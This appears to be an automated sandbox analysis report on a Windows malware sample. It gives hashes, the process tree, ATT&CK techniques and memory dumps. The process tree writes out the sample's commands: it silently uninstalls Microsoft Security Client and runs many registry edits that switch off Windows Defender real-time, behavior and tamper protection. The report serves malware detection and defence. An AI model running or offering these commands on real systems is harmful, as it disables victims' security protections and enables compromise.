Analysis

  • max time kernel
    91s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    24-11-2020 12:48

General

  • Target

    20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe

  • Size

    67KB

  • MD5

    e3bc953a18fe466cb008184a45c6c858

  • SHA1

    bcf4ffa92efac170177e5b8f9199bd8cf8c8d380

  • SHA256

    20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b

  • SHA512

    f0fd176cce8de8766f34b7d94e428173bdf83fa038611573aabb97dc78c01db3231aadd6fb1e8f0ebea1028238ded4eb8394db307f54fd9bb9eac8443936dc97

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Suspicious use of WriteProcessMemory 66 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
    "C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:656
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s
      2⤵
        PID:584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Program Files(x86)\Microsoft Security Client\Setup.exe" /x /s
        2⤵
          PID:3412
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s
          2⤵
            PID:204
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4080
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              3⤵
                PID:2392
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3488
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                3⤵
                  PID:940
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1520
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:184
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2132
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f
                    3⤵
                      PID:976
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:60
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:1676
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3936
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                        3⤵
                          PID:3808
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1812
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                          3⤵
                            PID:3312
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f
                          2⤵
                            PID:2204
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:912
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                              3⤵
                                PID:1664
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:196
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                3⤵
                                  PID:4012

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            Modify Registry

                            1
                            T1112

                            Disabling Security Tools

                            1
                            T1089

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • memory/60-7-0x0000000000000000-mapping.dmp
                            • memory/184-13-0x0000000000000000-mapping.dmp
                            • memory/196-12-0x0000000000000000-mapping.dmp
                            • memory/204-2-0x0000000000000000-mapping.dmp
                            • memory/584-0-0x0000000000000000-mapping.dmp
                            • memory/912-11-0x0000000000000000-mapping.dmp
                            • memory/940-15-0x0000000000000000-mapping.dmp
                            • memory/976-16-0x0000000000000000-mapping.dmp
                            • memory/1520-5-0x0000000000000000-mapping.dmp
                            • memory/1664-19-0x0000000000000000-mapping.dmp
                            • memory/1676-18-0x0000000000000000-mapping.dmp
                            • memory/1812-9-0x0000000000000000-mapping.dmp
                            • memory/2132-6-0x0000000000000000-mapping.dmp
                            • memory/2204-10-0x0000000000000000-mapping.dmp
                            • memory/2392-14-0x0000000000000000-mapping.dmp
                            • memory/3312-21-0x0000000000000000-mapping.dmp
                            • memory/3412-1-0x0000000000000000-mapping.dmp
                            • memory/3488-4-0x0000000000000000-mapping.dmp
                            • memory/3808-17-0x0000000000000000-mapping.dmp
                            • memory/3936-8-0x0000000000000000-mapping.dmp
                            • memory/4012-20-0x0000000000000000-mapping.dmp
                            • memory/4080-3-0x0000000000000000-mapping.dmp